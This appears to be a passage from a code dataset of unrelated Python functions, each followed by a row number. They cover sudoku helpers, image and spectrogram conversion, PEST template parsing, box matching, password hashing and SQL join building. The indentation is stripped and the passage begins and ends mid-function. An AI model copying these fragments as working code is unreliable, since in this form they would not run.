or (ctx.author.id == developer_id)
# User has a permission tag.
or (discord.utils.get(ctx.author.roles, name=str(f"fox:{ctx.command.name}")))
)
return commands.check(predicate)
| 5,735 |
def send_message(chat_id):
"""Send a message to a chat
If a media file is found, send_media is called, else a simple text message
is sent
"""
files = request.files
if files:
res = send_media(chat_id, request)
else:
message = request.form.get("message", default="Empty Message")
res = g.driver.chat_send_message(chat_id, message)
if res:
return jsonify(res)
else:
return False
| 5,736 |
def get_neighbours(sudoku, row, col):
"""Funkcja zwraca 3 listy sasiadow danego pola, czyli np. wiersz tego pola, ale bez samego pola"""
row_neighbours = [sudoku[row][y] for y in range(9) if y != col]
col_neighbours = [sudoku[x][col] for x in range(9) if x != row]
sqr_neighbours = [sudoku[x][y] for x in range(9) if x//3 == row//3 for y in range(9) if y//3 == col//3 if x!=row or y!=col]
return row_neighbours, col_neighbours, sqr_neighbours
| 5,737 |
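A small sketch for get_neighbours above, using a toy 9x9 grid where each cell stores row*10 + col so the neighbours are easy to read off.

sudoku = [[r * 10 + c for c in range(9)] for r in range(9)]
row_n, col_n, sqr_n = get_neighbours(sudoku, 0, 0)
print(len(row_n), len(col_n), len(sqr_n))  # 8 8 8
print(sqr_n)  # [1, 2, 10, 11, 12, 20, 21, 22] - the 3x3 block minus the cell itself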
def to_ndarray(image):
"""
Convert torch.Tensor or PIL.Image.Image to ndarray.
:param image: (torch.Tensor or PIL.Image.Image) image to convert to ndarray
:rtype (ndarray): image as ndarray
"""
if isinstance(image, torch.Tensor):
return image.numpy()
if isinstance(image, PIL.Image.Image):
return np.array(image)
raise TypeError("to_ndarray: expect torch.Tensor or PIL.Image.Image")
| 5,738 |
def make_map_exposure_true_energy(pointing, livetime, aeff, ref_geom, offset_max):
"""Compute exposure WcsNDMap in true energy (i.e. not convolved by Edisp).
Parameters
----------
pointing : `~astropy.coordinates.SkyCoord`
Pointing direction
livetime : `~astropy.units.Quantity`
Livetime
aeff : `~gammapy.irf.EffectiveAreaTable2D`
Effective area table
ref_geom : `~gammapy.maps.WcsGeom`
Reference WcsGeom object used to define geometry (space - energy)
offset_max : `~astropy.coordinates.Angle`
Maximum field of view offset.
Returns
-------
expmap : `~gammapy.maps.WcsNDMap`
Exposure cube (3D) in true energy bins
"""
offset = make_separation_map(ref_geom, pointing).quantity
# Retrieve energies from WcsNDMap
# Note this would require a log_center from the geometry
    # Or even better edges, but WcsNDMap does not really allow it.
energy = ref_geom.axes[0].center * ref_geom.axes[0].unit
exposure = aeff.data.evaluate(offset=offset, energy=energy)
exposure *= livetime
# We check if exposure is a 3D array in case there is a single bin in energy
# TODO: call np.atleast_3d ?
if len(exposure.shape) < 3:
exposure = np.expand_dims(exposure, 0)
# Put exposure outside offset max to zero
    # This might be dealt with more generally using a mask map
exposure[:, offset >= offset_max] = 0
data = exposure.to('m2 s')
return WcsNDMap(ref_geom, data)
| 5,739 |
def test_b64_reference() -> None:
"""Test b64() with test cases from the base64 RFC."""
test_cases = [
(b"", b""),
(b"f", b"Zg"),
(b"fo", b"Zm8"),
(b"foo", b"Zm9v"),
(b"foob", b"Zm9vYg"),
(b"fooba", b"Zm9vYmE"),
(b"foobar", b"Zm9vYmFy"),
]
for test_case in test_cases:
assert b64(test_case[0]) == test_case[1]
assert b64decode(test_case[1]) == test_case[0]
| 5,740 |
def calc_random_piv_error(particle_image_diameter):
"""
Caclulate the random error amplitude which is proportional to the diameter of the displacement correlation peak.
(Westerweel et al., 2009)
"""
c = 0.1
error = c*np.sqrt(2)*particle_image_diameter/np.sqrt(2)
return error
| 5,741 |
def resolve(name, module=None):
"""Resolve ``name`` to a Python object via imports / attribute lookups.
If ``module`` is None, ``name`` must be "absolute" (no leading dots).
If ``module`` is not None, and ``name`` is "relative" (has leading dots),
the object will be found by navigating relative to ``module``.
Returns the object, if found. If not, propagates the error.
"""
name = name.split('.')
if not name[0]:
if module is None:
raise ValueError("relative name without base module")
module = module.split('.')
name.pop(0)
while not name[0]:
module.pop()
name.pop(0)
name = module + name
used = name.pop(0)
found = __import__(used)
for n in name:
used += '.' + n
try:
found = getattr(found, n)
except AttributeError:
__import__(used)
found = getattr(found, n)
return found
| 5,742 |
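A usage sketch for resolve above, using only standard-library targets.

# absolute dotted path
join = resolve("os.path.join")
print(join("a", "b"))  # "a/b" (or "a\\b" on Windows)

# relative path navigated from a base module
dirname = resolve(".dirname", module="os.path")
print(dirname("/tmp/example"))  # "/tmp"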
def fibonacci(n:int) -> int:
"""Return the `n` th Fibonacci number, for positive `n`."""
if 0 <= n <= 1:
return n
n_minus1, n_minus2 = 1,0
result = None
for f in range(n - 1):
result = n_minus2 + n_minus1
n_minus2 = n_minus1
n_minus1 = result
return result
| 5,743 |
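A quick check of fibonacci above against the start of the sequence.

print([fibonacci(n) for n in range(10)])  # [0, 1, 1, 2, 3, 5, 8, 13, 21, 34]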
def change_level(new_level=''):
"""
Change the level of the console handler
"""
log = logging.getLogger('')
for hndl in log.handlers:
if isinstance(hndl, logging.StreamHandler):
if new_level:
hndl.setLevel(ll[new_level.upper()])
return
| 5,744 |
def event_social_link(transaction):
"""
GET /social-links/1/event
:param transaction:
:return:
"""
with stash['app'].app_context():
social_link = SocialLinkFactory()
db.session.add(social_link)
db.session.commit()
| 5,745 |
def get_budget(product_name, sdate):
"""
Budget for a product, limited to data available at the database
:param product_name:
:param sdate: starting date
:return: pandas series
"""
db = DB('forecast')
table = db.table('budget')
sql = select([table.c.budget]).where(table.c.product_name ==
product_name).order_by(asc('month'))
ans = db.query(sql).fetchall()
ret = []
for row in ans:
ret.append(float(row[0]))
date_index = pd.date_range(start = sdate, periods = len(ret), freq = 'M')
return pd.Series(data = ret, index = date_index)
| 5,746 |
def p_function_call(p):
"""FunctionCall : FunctionName '(' Arguments ')'
"""
p[0] = ast.FunctionCall(p[1], *p[3])
| 5,747 |
def stop(remove):
"""
Stop (and optionally remove, --remove) all containers running in background.
"""
if remove:
cmd='docker-compose down'
else:
cmd='docker-compose stop'
project_root=get_project_root()
os.chdir(project_root)
bash_command("Stopping containers", cmd)
| 5,748 |
def test_cli_size_opt(runner):
"""Test the CLI with size opt."""
resp = runner.invoke(cli.app, ['--size', '125', 'tests/data/sample image.png']) # noqa: E501
assert resp.exit_code == 0
assert resp.output.rstrip() == 'https://nsa40.casimages.com/img/2020/02/17/200217113356178313.png'
| 5,749 |
def _residual_block_basic(filters, kernel_size=3, strides=1, use_bias=False, name='res_basic',
kernel_initializer='he_normal', kernel_regularizer=regulizers.l2(1e-4)):
"""
Return a basic residual layer block.
:param filters: Number of filters.
:param kernel_size: Kernel size.
:param strides: Convolution strides
:param use_bias: Flag to use bias or not in Conv layer.
:param kernel_initializer: Kernel initialisation method name.
    :param kernel_regularizer: Kernel regularizer.
    :param name: Name prefix for the block's layers.
:return: Callable layer block
"""
def layer_fn(x):
x_conv1 = _res_conv(
filters=filters, kernel_size=kernel_size, padding='same', strides=strides,
use_relu=True, use_bias=use_bias,
kernel_initializer=kernel_initializer, kernel_regularizer=kernel_regularizer,
name=name + '_cbr_1')(x)
x_residual = _res_conv(
filters=filters, kernel_size=kernel_size, padding='same', strides=1,
use_relu=False, use_bias=use_bias,
kernel_initializer=kernel_initializer, kernel_regularizer=kernel_regularizer,
name=name + '_cbr_2')(x_conv1)
merge = _merge_with_shortcut(kernel_initializer, kernel_regularizer,name=name)(x, x_residual)
merge = Activation('relu')(merge)
return merge
return layer_fn
| 5,750 |
def main(bibtex_path: str):
"""
Entrypoint for migrate.py
:params bibtex_path: The PATH to the BibTex (.bib) file on the local machine.
"""
# Load BibTex file and parse it
bibtex_db = load_bibtex_file(
file_path=bibtex_path)
# Obtain every entry key name
bibtex_keys = bibtex_db.entries_dict.keys()
    # For all entries in the BibTex file, remove or replace the "{", "}", "\\textbar" and "\\&" characters in the title field
for key in bibtex_keys:
bibtex_entry = bibtex_db.entries_dict[key]
print(f"Entry before update: {bibtex_entry}")
# Update title
print(f"Old title: {bibtex_entry['title']}\nUpdating title.")
new_title = bibtex_entry["title"].replace("{", "").replace(
"}", "").replace("\\textbar", "|").replace("\\&", "&")
bibtex_entry["title"] = new_title
print(f"New title: {bibtex_entry['title']}")
try:
# Make sure booktitle doesn't contain "{", "}" characters
new_book_title = bibtex_entry["booktitle"].replace("{", "").replace(
"}", "")
bibtex_entry["booktitle"] = new_book_title
except KeyError:
print(
f"BibTex entry: {bibtex_entry['title']} isn't a book. Continuing...")
continue
# Update the top level dictionary
bibtex_db.entries_dict[key].update(bibtex_entry)
print(f"After update: {bibtex_db.entries_dict[key]}")
# Write out new BibTex file
with open("bibtex.bib", "w", encoding="utf-8") as bibtex_file:
bibtexparser.dump(bibtex_db, bibtex_file)
| 5,751 |
def time_count(start, end):
"""
Definition:
Simple function that prints how many seconds it took to run from the 'start'
variable to the 'end' variable.
Args:
start: Required. Usually a time.time() variable at the beginning of a cell.
end: Required. Usually a time.time() variable at the end of a cell.
Returns:
Prints the difference in time between the 'start' and 'end' variables.
"""
print(f"Time to run cell: {int(end-start)} seconds")
| 5,752 |
def console_script(tmpdir):
"""Python script to use in tests."""
script = tmpdir.join('script.py')
script.write('#!/usr/bin/env python\nprint("foo")')
return script
| 5,753 |
def parse_tpl_file(tpl_file):
""" parse a PEST-style template file to get the parameter names
Args:
tpl_file (`str`): path and name of a template file
Returns:
[`str`] : list of parameter names found in `tpl_file`
Example::
par_names = pyemu.pst_utils.parse_tpl_file("my.tpl")
"""
par_names = set()
with open(tpl_file, "r") as f:
try:
header = f.readline().strip().split()
assert header[0].lower() in [
"ptf",
"jtf",
], "template file error: must start with [ptf,jtf], not:" + str(header[0])
assert (
len(header) == 2
), "template file error: header line must have two entries: " + str(header)
marker = header[1]
assert len(marker) == 1, (
"template file error: marker must be a single character, not:"
+ str(marker)
)
for line in f:
par_line = set(line.lower().strip().split(marker)[1::2])
par_names.update(par_line)
# par_names.extend(par_line)
# for p in par_line:
# if p not in par_names:
# par_names.append(p)
except Exception as e:
raise Exception(
"error processing template file " + tpl_file + " :\n" + str(e)
)
# par_names = [pn.strip().lower() for pn in par_names]
# seen = set()
# seen_add = seen.add
# return [x for x in par_names if not (x in seen or seen_add(x))]
return [p.strip() for p in list(par_names)]
| 5,754 |
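A usage sketch for parse_tpl_file above, writing a tiny hypothetical PEST template to a temporary file; the parameter names rch_1 and rch_2 are invented for illustration.

import os
import tempfile

tpl_text = "ptf ~\nrecharge  ~ rch_1 ~   ~ rch_2 ~\n"
with tempfile.NamedTemporaryFile("w", suffix=".tpl", delete=False) as f:
    f.write(tpl_text)
    tpl_path = f.name

print(sorted(parse_tpl_file(tpl_path)))  # ['rch_1', 'rch_2']
os.remove(tpl_path)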
def test_setup_slack(db, mocker):
"""
Check that the correct operations are applied to create a channel.
"""
study = StudyFactory()
channel_name = study.kf_id.lower().replace("_", "-")
mock_client = mocker.patch("creator.slack.WebClient")
mock_client().conversations_create.return_value = {
"channel": {"id": "ABC", "name": channel_name}
}
assert study.slack_channel is None
setup_slack(study)
assert study.slack_channel == channel_name
# Channel is created
mock_client().conversations_create.assert_called_with(name=channel_name)
# Topic is set
assert mock_client().conversations_setTopic.call_count == 1
# Message is pinned
assert mock_client().chat_postMessage.call_count == 1
assert mock_client().pins_add.call_count == 1
# Users are invited
assert mock_client().conversations_invite.call_count == 1
| 5,755 |
def es_append_cve_by_query(es_index, q, cve):
"""Appends cve to all IPs in es_index by query"""
es = get_es_object()
es.update_by_query(index=es_index,
body={"script": {"inline": "if (ctx._source.cves == null) {ctx._source.cves = params.cvesparam }"
"else {if(!ctx._source.cves.cves.contains(params.cvesparam.cves) && "
"! ctx._source.cves.cves.equals(params.cvesparam.cves)){ "
"ctx._source.cves.cves.add(params.cvesparam.cves); "
"ctx._source.cves.links.add(params.cvesparam.links)}}", "lang":
"painless", "params": {"cvesparam":
{"links":["https://cve.mitre.org/cgi-bin/cvename.cgi?name=" + cve], "cves": [cve]}}}},
q=q)
| 5,756 |
def _save_downscaled(
item: Item,
image: Image,
ext: str,
target_type: str,
target_width: int,
target_height: int,
) -> Media:
"""Common downscale function."""
if ext != 'jpg':
image = image.convert('RGB')
# TODO - these parameters are only for jpg
kwargs = {
'quality': 80,
'progressive': True,
'optimize': True,
'subsampling': 0,
}
width, height = calculate_size(
original_width=image.width,
original_height=image.height,
target_width=target_width,
target_height=target_height,
)
smaller_image = image.resize((width, height))
return Media(
item_uuid=item.uuid,
created_at=datetime.datetime.now(tz=datetime.timezone.utc),
processed_at=None,
status='init',
type=target_type,
ext='jpg',
content=image_to_bytes(smaller_image, **kwargs),
)
| 5,757 |
def get_single_image_results(pred_boxes, gt_boxes, iou_thr):
"""Calculates number of true_pos, false_pos, false_neg from single batch of boxes.
Args:
gt_boxes (list of list of floats): list of locations of ground truth
objects as [xmin, ymin, xmax, ymax]
pred_boxes (dict): dict of dicts of 'boxes' (formatted like `gt_boxes`)
and 'scores'
iou_thr (float): value of IoU to consider as threshold for a
true prediction.
Returns:
dict: true positives (int), false positives (int), false negatives (int)
"""
all_pred_indices = range(len(pred_boxes))
all_gt_indices = range(len(gt_boxes))
if len(all_pred_indices) == 0:
tp = 0
fp = 0
fn = len(gt_boxes)
return {'true_pos': tp, 'false_pos': fp, 'false_neg': fn}
if len(all_gt_indices) == 0:
tp = 0
fp = len(pred_boxes)
fn = 0
return {'true_pos': tp, 'false_pos': fp, 'false_neg': fn}
gt_idx_thr = []
pred_idx_thr = []
ious = []
for ipb, pred_box in enumerate(pred_boxes):
for igb, gt_box in enumerate(gt_boxes):
iou = calc_iou_individual(pred_box, gt_box)
if iou > iou_thr:
gt_idx_thr.append(igb)
pred_idx_thr.append(ipb)
ious.append(iou)
args_desc = np.argsort(ious)[::-1]
if len(args_desc) == 0:
# No matches
tp = 0
fp = len(pred_boxes)
fn = len(gt_boxes)
else:
gt_match_idx = []
pred_match_idx = []
for idx in args_desc:
gt_idx = gt_idx_thr[idx]
pr_idx = pred_idx_thr[idx]
# If the boxes are unmatched, add them to matches
if (gt_idx not in gt_match_idx) and (pr_idx not in pred_match_idx):
gt_match_idx.append(gt_idx)
pred_match_idx.append(pr_idx)
tp = len(gt_match_idx)
fp = len(pred_boxes) - len(pred_match_idx)
fn = len(gt_boxes) - len(gt_match_idx)
return {'true_pos': tp, 'false_pos': fp, 'false_neg': fn}
| 5,758 |
def get_list(caller_id):
"""
@cmview_user
@response{list(dict)} PublicIP.dict property for each caller's PublicIP
"""
user = User.get(caller_id)
ips = PublicIP.objects.filter(user=user).all()
return [ip.dict for ip in ips]
| 5,759 |
def matrix_zeros(m, n, **options):
""""Get a zeros matrix for a given format."""
format = options.get('format', 'sympy')
dtype = options.get('dtype', 'float64')
spmatrix = options.get('spmatrix', 'csr')
if format == 'sympy':
return zeros(m, n)
elif format == 'numpy':
return _numpy_zeros(m, n, **options)
elif format == 'scipy.sparse':
return _scipy_sparse_zeros(m, n, **options)
    raise NotImplementedError('Invalid format: %r' % format)
| 5,760 |
def make_password(password, salt=None):
"""
Turn a plain-text password into a hash for database storage
Same as encode() but generate a new random salt. If password is None then
return a concatenation of UNUSABLE_PASSWORD_PREFIX and a random string,
which disallows logins. Additional random string reduces chances of gaining
access to staff or superuser accounts. See ticket #20079 for more info.
"""
if password is None:
return UNUSABLE_PASSWORD_PREFIX + get_random_string(
UNUSABLE_PASSWORD_SUFFIX_LENGTH)
if not isinstance(password, (bytes, str)):
raise TypeError(
'Password must be a string or bytes, got %s.'
% type(password).__qualname__
)
hasher = PBKDF2PasswordHasher()
salt = salt or hasher.salt()
return hasher.encode(password, salt)
| 5,761 |
def get_dialect(
filename: str, filehandle: Optional[TextIO] = None
) -> Type[csv.Dialect]:
"""Try to guess dialect based on file name or contents."""
dialect: Type[csv.Dialect] = csv.excel_tab
file_path = Path(filename)
if file_path.suffix == ".txt":
pass
elif file_path.suffix == ".csv":
if filehandle:
dialect = csv.Sniffer().sniff(filehandle.read(4 * 1024))
filehandle.seek(0)
else:
sys.stderr.write("Error: File does not have the ending csv or txt.\n")
sys.exit(2)
return dialect
| 5,762 |
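A usage sketch for get_dialect above, sniffing an in-memory comma-separated sample; it assumes the csv, sys and pathlib imports used by the function are in scope.

import csv
import io

sample = io.StringIO("a,b,c\n1,2,3\n4,5,6\n")
dialect = get_dialect("data.csv", sample)
print(dialect.delimiter)                          # ','
print(get_dialect("notes.txt") is csv.excel_tab)  # True (default for .txt)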
def load_object(primary_path: str, file_name: Optional[str] = None, module: Optional[str] = "pickle") -> Any:
"""
This is a generic function to load any given
object using different `module`s, e.g. pickle,
dill, and yaml.
    Note: See `get_file_path()` for details on how
    to set `primary_path` and `file_name`.
"""
file_path = get_file_path(primary_path, file_name)
logger.info(f"Loading '{file_path}'...")
if os.path.isfile(file_path):
if module == "yaml":
obj = load_yaml(file_path)
else:
obj = load_pickle(file_path, module)
logger.info(f"Successfully loaded '{file_path}'.")
return obj
else:
raise FileNotFoundError(f"Could not find '{file_path}'.")
| 5,763 |
def compute_spectrogram(
audio: Union[Path, Tuple[torch.Tensor, int]],
n_fft: int,
win_length: Optional[int],
hop_length: int,
n_mels: int,
mel: bool,
time_window: Optional[Tuple[int, int]],
**kwargs,
) -> torch.Tensor:
"""
Get the spectrogram of an audio file.
Args:
audio: Path of the audio file or a (waveform, sample_rate) tuple.
n_fft:
win_length:
hop_length:
n_mels:
mel: If true we want melodic spectrograms.
time_window: A tuple of two time values such we get the sliced spectrogram w.r.t. that window.
kwargs:
"""
# See if we have to deal with an audio file or (waveform, sample rate).
if isinstance(audio, Path):
waveform, sample_rate = torchaudio.load(audio, format="ogg")
elif isinstance(audio[0], torch.Tensor) and isinstance(audio[1], int):
waveform = audio[0]
sample_rate = audio[1]
else:
raise Exception(
"Input audio worng, it must be either a path to an audio file or a (waveform, sample rate) tuple."
)
spectrogram: Callable
if not mel:
spectrogram = T.Spectrogram(
n_fft=n_fft,
win_length=win_length,
hop_length=hop_length,
center=True,
pad_mode="reflect",
power=2.0,
)
else:
# Mel Spectrogram transform.
spectrogram = T.MelSpectrogram(
sample_rate=sample_rate,
n_fft=n_fft,
win_length=win_length,
hop_length=hop_length,
center=True,
pad_mode="reflect",
power=2.0,
norm="slaney",
onesided=True,
n_mels=n_mels,
mel_scale="htk",
)
if time_window:
# We convert the time window from seconds to frames.
start, end = np.asarray(time_window) * sample_rate
waveform = waveform[:, start:end]
return spectrogram(waveform)
| 5,764 |
def decode_html_dir(new):
""" konvertiert bestimmte Spalte in HTML-Entities """
def decode(key):
return decode_html(unicode(new[key]))
if new.has_key('title') and new['title'].find('&') >= 0:
new['title'] = decode('title')
if new.has_key('sub_title') and new['sub_title'].find('&') >= 0:
new['sub_title'] = decode('sub_title')
if new.has_key('text') and new['text'].find('&') >= 0:
new['text'] = decode('text')
if new.has_key('text_more') and new['text_more'].find('&') >= 0:
new['text_more'] = decode('text_more')
if new.has_key('sections') and new['sections'].find('&') >= 0:
new['sections'] = decode('sections')
if new.has_key('section') and new['section'].find('&') >= 0:
new['section'] = decode('section')
if new.has_key('anti_spam_question'):
new['anti_spam_question'] = decode('anti_spam_question')
return new
| 5,765 |
def apply_hash(h, key):
"""
Apply a hash function to the key.
This function is a wrapper for xxhash functions with initialized seeds.
Currently assume h is a xxhash.x32 object with initialized seed
If we change choice of hash function later, it will be easier to change
how we apply the hash (either through a function or an object) in this method
Parameters
----------
h : hash function to apply
key : key to hash
Returns
-------
val : int
The hash value of the hashed key.
"""
h.update(key)
val = h.intdigest() # TODO: What representation to return? (hex in str format?)
h.reset()
return val
| 5,766 |
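A usage sketch for apply_hash above, assuming the third-party xxhash package is available; the seed value is arbitrary.

import xxhash

h = xxhash.xxh32(seed=42)
print(apply_hash(h, b"example-key"))
print(apply_hash(h, b"example-key"))  # same value again: reset() keeps calls independent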
def test_experiment_mnist_custom(experiment_files_fixture):
"""
Test of a MIA on the MNIST dataset with custom model for the MNIST
model, custom mode for the MIA model and custom optimizer options
"""
experiment(academic_dataset = 'mnist',
target_model_path = target_path.as_posix(),
mia_model_path = mia_path.as_posix(),
custom_target_model = OrderedDict([
('conv1' , nn.Conv2d(1, 10, 3, 1)),
('relu1' , nn.ReLU()),
('maxpool1' , nn.MaxPool2d(2, 2)),
('conv2' , nn.Conv2d(10, 10, 3, 1)),
('relu2' , nn.ReLU()),
('maxpool2' , nn.MaxPool2d(2, 2)),
('to1d' , Flatten()),
('dense1' , nn.Linear(5*5*10, 500)),
('tanh' , nn.Tanh()),
('dense2' , nn.Linear(500, 10)),
('logsoftmax' , nn.LogSoftmax(dim=1))
]),
custom_target_optim_args = {'lr' : 0.02, 'momentum' : 0.3},
custom_mia_model = OrderedDict([
('dense1' , nn.Linear(20, 50)),
('tanh' , nn.Tanh()),
('dense2' , nn.Linear(50, 2)),
('logsoftmax' , nn.LogSoftmax(dim=1))
]),
custom_mia_optim_args = {'lr' : 0.02, 'momentum' : 0.3},
shadow_number = 50,
custom_shadow_model = OrderedDict([
('conv1' , nn.Conv2d(1, 15, 7, 1)),
('relu1' , nn.ReLU()),
('maxpool1' , nn.MaxPool2d(2, 2)),
('conv2' , nn.Conv2d(15, 25, 7, 1)),
('relu2' , nn.ReLU()),
('maxpool2' , nn.MaxPool2d(2, 2)),
('to1d' , Flatten()),
('dense1' , nn.Linear(2*2*25, 50)),
('tanh' , nn.Tanh()),
('dense2' , nn.Linear(50, 10)),
('logsoftmax' , nn.LogSoftmax(dim=1))
]),
custom_shadow_optim_args = {'lr' : 0.02, 'momentum' : 0.3},
shadow_model_base_path = shadow_base_path.as_posix(),
mia_train_ds_path = mia_train_ds_path.as_posix(),
mia_test_ds_path = mia_test_ds_path.as_posix(),
class_number = 10)
assert target_path.exists()
assert mia_path.exists()
remove_experiment_files()
| 5,767 |
def dmsp_enz_deg(
c,
t,
alpha,
vmax,
vmax_32,
kappa_32,
k
):
"""
Function that computes dD32_dt and dD34_dt of DMSP
Parameters
----------
c: float.
Concentration of DMSP in nM.
t: int
Integration time in min.
alpha: float.
Alpha for cleavage by DddP from this study.
vmax: float.
Vmax for cleavage by DddP, calculated from the K M that the enzyme should have to
exhibit the pattern of d34S DMSP vs. time, in nM/min/nM enzyme
Vmax_d: float.
km: float.
K M that the enzyme should have to exhibit the pattern of d34S DMSP vs. time, in nM.
k: float.
Degradation rate of the enzyme, in min^-1.
Returns
-------
The dD32_dt and dD34_dt of DMSP
"""
# Unpack isotopes
enzyme, dmsp_34, dmsp_32 = c
#Calculate vmax_34 assuming that Vmax total = Vmax_32 + Vmax_34
#This assumption would only hold true at saturation
vmax_34 = vmax-vmax_32
#Determination of kappa 32 from kappa 34 and the fractionation factor
kappa_34 = kappa_32 * alpha
# Calculate dD34_dt
dD34_dt = - ((kappa_34 * enzyme * (vmax_34 * enzyme * dmsp_34/((vmax_34 * enzyme)+(kappa_34 * enzyme * dmsp_34)))))
# Calculate dD32_dt
dD32_dt = - ((kappa_32 * enzyme * (vmax_32 * enzyme * dmsp_32/((vmax_32 * enzyme)+(kappa_32 * enzyme * dmsp_32)))))
#Calculate dE_dt
dE_dt = -k*enzyme
return [dE_dt, dD34_dt, dD32_dt]
| 5,768 |
def debug(msg):
"""If program was run with -d argument, send parm string to stdout."""
if DEBUG_ENABLED:
print("Debug: {}".format(msg))
| 5,769 |
def plot_holdings(returns, positions, legend_loc='best', ax=None, **kwargs):
"""Plots total amount of stocks with an active position, either short
or long.
Displays daily total, daily average per month, and all-time daily
average.
Parameters
----------
returns : pd.Series
Daily returns of the strategy, noncumulative.
- See full explanation in tears.create_full_tear_sheet.
positions : pd.DataFrame, optional
Daily net position values.
- See full explanation in tears.create_full_tear_sheet.
legend_loc : matplotlib.loc, optional
The location of the legend on the plot.
ax : matplotlib.Axes, optional
Axes upon which to plot.
**kwargs, optional
Passed to plotting function.
Returns
-------
ax : matplotlib.Axes
The axes that were plotted on.
"""
if ax is None:
ax = plt.gca()
positions = positions.copy().drop('cash', axis='columns')
df_holdings = positions.apply(lambda x: np.sum(x != 0), axis='columns')
    df_holdings_by_month = df_holdings.resample('1M').mean()
df_holdings.plot(color='steelblue', alpha=0.6, lw=0.5, ax=ax, **kwargs)
df_holdings_by_month.plot(
color='orangered',
alpha=0.5,
lw=2,
ax=ax,
**kwargs)
ax.axhline(
df_holdings.values.mean(),
color='steelblue',
ls='--',
lw=3,
alpha=1.0)
ax.set_xlim((returns.index[0], returns.index[-1]))
ax.legend(['Daily holdings',
'Average daily holdings, by month',
'Average daily holdings, net'],
loc=legend_loc)
ax.set_title('Holdings per Day')
ax.set_ylabel('Amount of holdings per day')
ax.set_xlabel('')
return ax
| 5,770 |
def get_systemd_run_args(available_memory):
"""
Figure out if we're on system with cgroups v2, or not, and return
appropriate systemd-run args.
If we don't have v2, we'll need to be root, unfortunately.
"""
args = [
"systemd-run",
"--uid",
str(os.geteuid()),
"--gid",
str(os.getegid()),
"-p",
f"MemoryLimit={available_memory // 2}B",
]
try:
check_call(args + ["--user", "printf", "hello"])
args += ["--user", "--scope"]
except CalledProcessError:
# cgroups v1 doesn't do --user :(
args = ["sudo", "--preserve-env=PATH"] + args + ["-t", "--same-dir"]
return args
| 5,771 |
def distribution_plot(x1, x2=None, x3=None, x4=None, label1='train',
label2='back_test', label3=None, label4 = None,
title=None, xlabel=None, ylabel=None, figsize=(12, 3)):
"""
:param x1: pd series or np array with shape (n1,)
:param x2: pd series or np array with shape (n2,)
:param x3: pd series or np array with shape (n3,)
:param x4: pd series or np array with shape (n3,)
:param label1:
:param label2:
:param title:
:param xlabel:
:param ylabel:
:param figsize:
:return:
"""
fig, ax = plt.subplots(figsize=figsize)
sns.kdeplot(x1, shade=True, color=color[0], label=label1, alpha=.6, ax=ax)
if x2 is not None:
sns.kdeplot(x2, shade=True, color=color[1], label=label2, alpha=.4, ax=ax)
if label3 is None:
label3 = label2
if x3 is not None:
sns.kdeplot(x3, shade=True, color=color[2], label=label3, alpha=.4, ax=ax)
if label4 is None:
label4 = label3
if x4 is not None:
sns.kdeplot(x4, shade=True, color=color[3], label=label4, alpha=.4, ax=ax)
if title is not None:
plt.title(title, fontsize=16)
if xlabel is not None:
plt.xlabel(xlabel)
if ylabel is not None:
plt.ylabel(ylabel)
    plt.savefig(PATH + 'phân bố ', bbox_inches='tight', dpi=1200)
plt.show()
| 5,772 |
def concatenation_sum(n: int) -> int:
"""
Algo:
1. Find length of num (n), i.e. number of digits 'd'.
2. Determine largest number with 'd - 1' digits => L = 10^(d - 1) - 1
3. Find diff => f = n - L
4. Now, the sum => s1 = f * d, gives us the number of digits in the string formed by all 'd'-digit numbers
less than or equal to 'n'.
5. Now, iteratively calculate and sum ((10^(d-i) - 10^(d-i-1)) * (d-i)) for i ∈ [1, d)
6. This will determine the number of digits in the string formed by all 'd-1', 'd-2', and so on -digits numbers.
:param n: Max number
:return: Number of digits in the string, formed by concatenating all the numbers from 1 to n.
"""
d = len(str(n))
L = 10**(d - 1) - 1
f = n - L
s1 = f * d
s2 = get_numdigs_sum_upto(d - 1)
return s1 + s2
| 5,773 |
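A worked example, together with a plausible implementation of the get_numdigs_sum_upto helper referenced in steps 5-6 of the docstring; the helper shown here is an assumption, not the original definition.
def get_numdigs_sum_upto(d: int) -> int:
    # Total number of digits contributed by all 1-, 2-, ..., d-digit numbers:
    # for each width i there are (10**i - 10**(i - 1)) numbers of i digits each.
    return sum((10**i - 10**(i - 1)) * i for i in range(1, d + 1))

# For n = 13 the concatenation "12345678910111213" has 17 characters:
# d = 2, L = 9, f = 4, s1 = 4 * 2 = 8 (the two-digit numbers 10..13),
# s2 = get_numdigs_sum_upto(1) = 9 (the one-digit numbers 1..9).
assert concatenation_sum(13) == 17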
def customize_compiler_gcc(self):
"""inject deep into distutils to customize how the dispatch
to gcc/nvcc works.
If you subclass UnixCCompiler, it's not trivial to get your subclass
injected in, and still have the right customizations (i.e.
distutils.sysconfig.customize_compiler) run on it. So instead of going
    the OO route, I have this. Note, it's kind of like a weird functional
subclassing going on."""
    # tell the compiler it can process .cu
self.src_extensions.append('.cu')
    # save references to the default compiler_so and _compile methods
default_compiler_so = self.compiler_so
    default_compile = self._compile
# now redefine the _compile method. This gets executed for each
# object but distutils doesn't have the ability to change compilers
# based on source extension: we add it.
def _compile(obj, src, ext, cc_args, extra_postargs, pp_opts):
postargs = extra_postargs['gcc']
        default_compile(obj, src, ext, cc_args, postargs, pp_opts)
# reset the default compiler_so, which we might have changed for cuda
self.compiler_so = default_compiler_so
# inject our redefined _compile method into the class
self._compile = _compile
| 5,774 |
def make_join_conditional(key_columns: KeyColumns, left_alias: str, right_alias: str) -> Composed:
"""
Turn a pair of aliases and a list of key columns into a SQL safe string containing
join conditionals ANDed together.
s.id1 is not distinct from d.id1 and s.id2 is not distinct from d.id2
"""
composed_aliases = {"left_alias": Identifier(left_alias), "right_alias": Identifier(right_alias)}
template = "{left_alias}.{column} {equality} {right_alias}.{column}"
composed_conditionals = [
SQL(template).format(
column=Identifier(c.name),
equality=SQL("=" if c.not_nullable else "is not distinct from"),
**composed_aliases,
)
for c in key_columns
]
return SQL(" and ").join(composed_conditionals)
| 5,775 |
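A usage sketch, assuming KeyColumns is an iterable of objects exposing name and not_nullable attributes (a namedtuple stands in here); rendering the Composed result to text requires a live psycopg2 connection.
from collections import namedtuple

# Hypothetical stand-in for the element type of KeyColumns.
KeyColumn = namedtuple("KeyColumn", ["name", "not_nullable"])

key_columns = [KeyColumn("id1", True), KeyColumn("id2", False)]
conditional = make_join_conditional(key_columns, "s", "d")
# With a live connection:
#   conditional.as_string(conn)
#   -> '"s"."id1" = "d"."id1" and "s"."id2" is not distinct from "d"."id2"'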
def home():
""" Home interface """
return '''<!doctype html>
<meta name="viewport" content="width=device-width, initial-scale=1" />
